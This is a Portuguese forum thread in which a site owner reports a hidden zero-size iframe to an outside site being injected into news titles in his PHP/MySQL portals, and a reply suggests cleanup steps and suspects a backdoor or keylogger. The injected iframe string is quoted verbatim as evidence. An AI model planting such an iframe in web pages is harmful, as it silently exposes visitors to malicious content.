Gabriel Vince Postado Dezembro 16, 2010 Denunciar Share Postado Dezembro 16, 2010 Olá, Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando "<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>" alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ... Gostaria de saber o que vocês fariam com essa falha de segurança...Considerando queJá tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece... Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 rickayron Postado Dezembro 16, 2010 Denunciar Share Postado Dezembro 16, 2010 Olá, Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando "<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>" alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ... Gostaria de saber o que vocês fariam com essa falha de segurança...Considerando queJá tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece...1°) limpar seu computador pessoal, ou o computador que utiliza para desenvolver, e acessar seu sistema.2°) configurar seu firewall, antivirus, e passar um bom adware.3°) substitua os arquivos nos servidores pelos seus backups nativos. caso não tenha nenhum passe um pente fino nos scripts(dependendo do sistema vai ser osso.).4°) verifique no seu banco de dados os usuarios com previlegios e certifique que todas as contas tenham precedentes.Pelo que relatou é provavel que o seu servidor tenha sido invadido e implatado um backdoor ou então a sua maquina a utiliza para acessar as suas contas está rodando um keyloger que ta enviando todas as informações para um malfeitor.até mais Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Gabriel Vince
Olá,
Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar
Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando
"<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>"
alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ...
Gostaria de saber o que vocês fariam com essa falha de segurança...
Considerando que
Já tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece...
Link para o comentário
Compartilhar em outros sites
1 resposta a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.